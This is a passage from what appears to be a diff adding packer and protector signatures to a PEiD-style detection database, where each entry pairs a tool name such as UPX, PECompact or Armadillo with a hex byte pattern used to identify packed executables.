+signature = 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB EE 90 14 2C 77 2A D3 EB 01 87 2A D3 E8 01 00 00 00 92 59 88 16 EB 02 52 08 46 EB 02 CD 20 4B 80 F1 C2 85 DB 75 AE C1 E0 04 EB 00 DA B2 82 5C 9B C7 89 98 4F 8A F7 ?? ?? ?? B1 4D DF B8 AD AC AB D4 07 27 D4 50 CF 9A D5 1C EC F2 27 77 18 40 4E A4 A8 B4 CB 9F 1D D9 EC 1F AD BC 82 AA C0 4C 0A A2 15 45 18 8F BB 07 93 BE C0 BC A3 B0 9D 51 D4 F1 08 22 62 96 6D 09 73 7E 71 A5 3A E5 7D 94 A3 96 99 98 72 B2 31 57 7B FA AE 9D 28 4F 99 EF A3 25 49 60 03 42 8B 54 53 5E 92 50 D4 52 4D C1 55 76 FD F7 8A FC 78 0C 82 87 0F
+ep_only = true
+
+[PECompact 2.0beta/student version ->Jeremy Collake]
+signature=B8 ?? ?? ?? EE 05 12 13 13 12 50 64 FF 35 00 00 00 00 64 89 25 00
+ep_only = true
+
+[EXE Shield v0.5-v0.6 -> Smoke]
+signature=E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED BC 1A 40 00 EB 01 00 8D B5 46 1B 40 00 BA B3 0A 00 00 EB 01 00 8D 8D F9 25 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 90
+ep_only = true
+
+[Thinstall v2.403 ->Jitit ]
+signature=6A 00 FF 15 20 50 40 00 E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 57 BF 00 00 80 00 39 79 14 77 36 53 56 8B B1 29 04 00 00 8B 41 0C 8B 59 10 03 DB 8A 14 30 83 E2 01 0B D3 C1 E2 07 40 89 51 10 89 41 0C 0F B6 04 30 C1 61 14 08 D1 E8 09 41 10 39
+ep_only = true
+
+[PECompact 2.x (beta version) ->Jeremy Collake]
+signature=B8 ?? ?? ?? 00 80 00 28 40
+ep_only = true
+
+[PECompact 2.0x Heuristic Mode -> Jeremy Collake]
+signature=B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00
+ep_only = true
+
+[PECompact 2.0x Heuristic Mode -> Jeremy Collake]
+signature=B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00
+ep_only = true
+
+[Armadillo 3.00a -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD 26 42
+ep_only = true
+
+[Armadillo 3.00a -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD 26 42
+ep_only = true
+
+[Armadillo 3.01 - 3.50a -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD B8 43
+ep_only = true
+
+[Armadillo 3.6x -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD AB 76
+ep_only = true
+
+[Armadillo 3.7x -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 B8 3B 01 00 00 03 C5 33 DB 81 C3 01 01 01 01 31 18 81 38 78 54 00 00 74 04 31 18 EB EC
+ep_only = true
+
+[Soft Defender v1.1x -> Randy Li]
+signature = 74 07 75 05 ?? ?? ?? ?? ?? 74 1F 75 1D ?? 68 ?? ?? ?? 00 59 9C 50 74 0A 75 08 ?? 59 C2 04 00 ?? ?? ?? E8 F4 FF FF FF ?? ?? ?? 78 0F 79 0D
+ep_only = true
+
+[EXE Stealth v2.74 -> WebToolMaster]
+signature = EB 00 EB 17 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 60 90 E8 00 00 00 00 5D
+ep_only = true
+
+[AHTeam EP Protector v0.3 -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0
+ep_only = true
+
+[PECompact v2.0 beta -> Jeremy Collake]
+signature = B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC 90 90 90 90
+ep_only = true
+
+[PKLITE32 1.1 -> PKWARE Inc.]
+signature = 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 00 00 00 00 E8 ?? ?? ?? ?? E9
+ep_only = true
+
+[tElock 1.0 (private) -> tE!]
+signature = E9 ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32
+ep_only = true
+
+[Mew 10 exe-coder 1.0  -> Northfox [HCC]]
+signature = 33 C0 E9 ?? ?? FF FF 6A ?? ?? ?? ?? ?? 70
+ep_only = true
+
+[FSG v2.0 -> bart/xt]
+signature = 87 25 ?? ?? ?? 00 61 94 55 A4 B6 80 FF 13
+ep_only = true
+
+[PeCompact v2.08->Bitsum Technologies(signature by loveboom)]
+signature = B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D
+ep_only=true
+
+[MEW 11 SE v1.1  -> Northfox [HCC]]
+signature = E9 ?? ?? ?? FF 0C ?0
+ep_only = true
+
+[yoda's Protector 1.0x-->Ashkbiz Danehkar]
+signature = 55 8B EC 53 56 57 E8 03 00 00 00 EB 01
+ep_only = true
+
+[yoda's Crypter 1.3-->Ashkbiz Danehkar]
+signature = 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 6C 28 40 00 B9 5D 34 40 00
+ep_only = true
+
+[UPX v1.03 - v1.04]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC
+ep_only = true
+
+[UPX v0.89.6 - v1.02 / v1.05 -v1.22 (Delphi) stub]
+signature = 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B
+ep_only = true
+
+[UPX v0.81 - v0.84 Modified]
+signature = 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF
+ep_only = true
+
+[UPX v0.89.6 - v1.02 / v1.05 - v1.22 Modified]
+signature = 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75
+ep_only = true
+
+[UPX v1.03 - v1.04 Modified]
+signature = 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF
+ep_only = true
+
+[UPX Alternative stub]
+signature = 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 00 00 00 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B
+ep_only = true
+
+[UPX Modifier v0.1x]
+signature = 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD
+ep_only = true
+
+[UPX Modified stub]
+signature = 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 84 ?? 00 00 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 88 ?? 00 00 61 E9 ?? ?? ?? FF
+ep_only = true
+
+[UPX Protector v1.0x]
+signature = EB EC ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07
+ep_only = true
+
+[UPX + ECLiPSE layer]
+signature = B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01
+ep_only = true
+
+[UPX-Scrambler RC v1.x]
+signature = 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF
+ep_only = true
+
+[UPXShit 0.06]
+signature = B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? E2 FA E9 D6 FF FF FF
+ep_only = true
+
+[VBOX v4.2 MTE]
+signature = 8C E0 0B C5 8C E0 0B C4 03 C5 74 00 74 00 8B C5
+ep_only = true
+
+[VBOX v4.3 MTE]
+signature = 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0
+ep_only = true
+
+[VOB ProtectCD 5]
+signature = 36 3E 26 8A C0 60 E8
+ep_only = true
+
+[VOB ProtectCD]
+signature = 5F 81 EF ?? ?? ?? ?? BE ?? ?? 40 ?? 8B 87 ?? ?? ?? ?? 03 C6 57 56 8C A7 ?? ?? ?? ?? FF 10 89 87 ?? ?? ?? ?? 5E 5F
+ep_only = true
+
+[Virogen Crypt v0.75]
+signature = 9C 55 E8 EC 00 00 00 87 D5 5D 60 87 D5 80 BD 15 27 40 00 01
+ep_only = true
+
+[Winkript v1.0]
+signature = 33 C0 8B B8 00 ?? ?? ?? 8B 90 04 ?? ?? ?? 85 FF 74 1B 33 C9 50 EB 0C 8A 04 39 C0 C8 04 34 1B 88 04 39 41 3B CA 72 F0 58
+ep_only = true
+
+[WinZip 32-bit SFX v6.x module]
+signature = FF 15 ?? ?? ?? 00 B1 22 38 08 74 02 B1 20 40 80 38 00 74 10 38 08 74 06 40 80 38 00 75 F6 80 38 00 74 01 40 33 C9 ?? ?? ?? ?? FF 15
+ep_only = true
+
+[WinZip 32-bit SFX v8.x module]
+signature = 53 FF 15 ?? ?? ?? 00 B3 22 38 18 74 03 80 C3 FE 8A 48 01 40 33 D2 3A CA 74 0A 3A CB 74 06 8A 48 01 40 EB F2 38 10 74 01 40 ?? ?? ?? ?? FF 15
+ep_only = true
+
+[WinRAR 32-bit SFX Module]
+signature = E9 ?? ?? 00 00 00 00 00 00 90 90 90 ?? ?? ?? ?? ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? FF
+ep_only = true
+
+[Wise Installer Stub]
+signature = 55 8B EC 81 EC ?? 04 00 00 53 56 57 6A ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? 40 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? 20 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 74
+ep_only = true
+
+[Wise Installer Stub]
+signature = 55 8B EC 81 EC 78 05 00 00 53 56 BE 04 01 00 00 57 8D 85 94 FD FF FF 56 33 DB 50 53 FF 15 34 20 40 00 8D 85 94 FD FF FF 56 50 8D 85 94 FD FF FF 50 FF 15 30 20 40 00 8B 3D 2C 20 40 00 53 53 6A 03 53 6A 01 8D 85 94 FD FF FF 68 00 00 00 80 50 FF D7 83 F8 FF 89 45 FC 0F 84 7B 01 00 00 8D 85 90 FC FF FF 50 56 FF 15 28 20 40 00 8D 85 98 FE FF FF 50 53 8D 85 90 FC FF FF 68 10 30 40 00 50 FF 15 24 20 40 00 53 68 80 00 00 00 6A 02 53 53 8D 85 98 FE FF FF 68 00 00 00 40 50 FF D7 83 F8 FF 89 45 F4 0F 84 2F 01 00 00 53 53 53 6A 02 53 FF 75 FC FF 15 00 20 40 00 53 53 53 6A 04 50 89 45 F8 FF 15 1C 20 40 00 8B F8 C7 45 FC 01 00 00 00 8D 47 01 8B 08 81 F9 4D 5A 9A 00 74 08 81 F9 4D 5A 90 00 75 06 80 78 04 03 74 0D FF 45 FC 40 81 7D FC 00 80 00 00 7C DB 8D 4D F0 53 51 68
+ep_only = true
+
+[Wise Installer Stub v1.10.1029.1]
+signature = 55 8B EC 81 EC 40 0F 00 00 53 56 57 6A 04 FF 15 F4 30 40 00 FF 15 74 30 40 00 8A 08 89 45 E8 80 F9 22 75 48 8A 48 01 40 89 45 E8 33 F6 84 C9 74 0E 80 F9 22 74 09 8A 48 01 40 89 45 E8 EB EE 80 38 22 75 04 40 89 45 E8 80 38 20 75 09 40 80 38 20 74 FA 89 45 E8 8A 08 80 F9 2F 74 2B 84 C9 74 1F 80 F9 3D 74 1A 8A 48 01 40 EB F1 33 F6 84 C9 74 D6 80 F9 20 74
+ep_only = true
+
+[WWPack32 v1.00, v1.11, v1.12, v1.20]
+signature = 53 55 8B E8 33 DB EB 60 0D 0A 0D 0A 57 57 50 61 63 6B 33 32
+ep_only = true
+
+[WWPack32 v1.x]
+signature = 53 55 8B E8 33 DB EB 60
+ep_only = true
+
+[X-PEOR v0.99b]
+signature = E8 00 00 00 00 5D 8B CD 81 ED 7A 29 40 00 89 AD 0F 6D 40 00
+ep_only = true
+
+[Xtreme-Protector v1.05]
+signature = E9 ?? ?? 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Xtreme-Protector v1.06]
+signature = B8 ?? ?? ?? 00 B9 75 ?? ?? 00 50 51 E8 05 00 00 00 E9 4A 01 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 8A 06 46 88 07 47 BB 02 00 00 00 02 D2 75 05 8A 16 46 12 D2 73 EA 02 D2 75 05 8A 16 46 12 D2 73 4F 33 C0 02 D2 75 05 8A 16 46 12 D2 0F 83 DF 00 00 00 02 D2 75 05 8A 16 46 12 D2 13 C0 02 D2 75 05 8A 16 46 12 D2 13 C0 02 D2 75 05 8A 16 46 12 D2 13 C0 02 D2 75 05 8A 16 46 12 D2 13 C0 74 06 57 2B F8 8A 07 5F 88 07 47 BB 02 00 00 00 EB 9B B8 01 00 00 00 02 D2 75 05 8A 16 46 12 D2 13 C0 02 D2 75 05 8A 16 46 12 D2 72 EA 2B C3 BB 01 00 00 00 75 28 B9 01 00 00 00 02 D2 75 05 8A 16 46 12 D2 13 C9 02 D2 75 05 8A 16 46 12 D2 72 EA 56 8B F7 2B F5 F3 A4 5E E9 4F FF FF FF 48 C1 E0 08 8A 06 46 8B E8 B9 01 00 00 00 02 D2 75 05 8A 16 46 12 D2 13 C9 02 D2 75 05 8A 16 46 12 D2 72 EA 3D 00 7D 00 00 73 1A 3D 00 05 00 00 72 0E 41 56 8B F7 2B F0 F3 A4 5E E9 0F FF FF FF 83 F8 7F 77 03 83 C1 02 56 8B F7 2B F0 F3 A4 5E E9 FA FE FF FF 8A 06 46 33 C9 C0 E8 01 74 17 83 D1 02 8B E8 56 8B F7 2B F0 F3 A4 5E BB 01 00 00 00 E9 D9 FE FF FF 2B 7C 24 28 89 7C 24 1C 61 C2 08 00 E9 ?? ?? ?? 00 E9 38 ?? ?? ?? 01
+ep_only = true
+
+[XCR v0.11]
+signature = 60 8B F0 33 DB 83 C3 01 83 C0 01
+ep_only = true
+
+[XCR v0.12]
+signature = 60 9C E8 ?? ?? ?? ?? 8B DD 5D 81 ED ?? ?? ?? ?? 89 9D
+ep_only = true
+
+[XCR v0.13]
+signature = 93 71 08 ?? ?? ?? ?? ?? ?? ?? ?? 8B D8 78 E2 ?? ?? ?? ?? 9C 33 C3 ?? ?? ?? ?? 60 79 CE ?? ?? ?? ?? E8 01 ?? ?? ?? ?? 83 C4 04 E8 AB FF FF FF ?? ?? ?? ?? 2B E8 ?? ?? ?? ?? 03 C5 FF 30 ?? ?? ?? ?? C6 ?? EB
+ep_only = true
+
+[X-PEOR v0.99b]
+signature = E8 ?? ?? ?? ?? 5D 8B CD 81 ED 7A 29 40 ?? 89 AD 0F 6D 40
+ep_only = true
+
+[y0da's Crypter v1.0]
+signature = 60 E8 00 00 00 00 5D 81 ED E7 1A 40 00 E8 A1 00 00 00 E8 D1 00 00 00 E8 85 01 00 00 F7 85
+ep_only = true
+
+[y0da's Crypter v1.1]
+signature = 60 E8 00 00 00 00 5D 81 ED 8A 1C 40 00 B9 9E 00 00 00 8D BD 4C 23 40 00 8B F7 33
+ep_only = true
+
+[y0da's Crypter v1.2]
+signature = 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC
+ep_only = true
+
+[y0da's Crypter v1.x / Modified]
+signature = 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? B9 ?? ?? 00 00 8D BD ?? ?? ?? ?? 8B F7 AC
+ep_only = true
+
+[ZCode Win32/PE Protector v1.01]
+signature = E9 12 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E9 FB FF FF FF C3 68 ?? ?? ?? ?? 64 FF 35
+ep_only = true
+
+[*** Protector v1.1.11 (DDeM->PE Engine v0.9, DDeM->CI v0.9.2)]
+signature = 53 51 56 E8 00 00 00 00 5B 81 EB 08 10 00 00 8D B3 34 10 00 00 B9 F3 03 00 00 BA 63 17 2A EE 31 16 83 C6 04
+
+[Mew 10 v1.0 (Eng) -> Northfox]
+signature = 33 C0 E9 ?? ?? ?? FF
+ep_only = true
+
+[AHTeam EP Protector v0.3 -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0
+ep_only = true
+
+[PECompact v2.0]
+signature = B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00
+ep_only = true
+[Exe Stealth 2.75a -> WebtoolMaster]
+signature = EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 90 60 90 E8 00 00 00 00 5D 81 ED F7 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 74 28 40 00 8B F7 AC
+ep_only = True
+
+[AHTeam EP Protector v0.3 -> FEUERRADER]
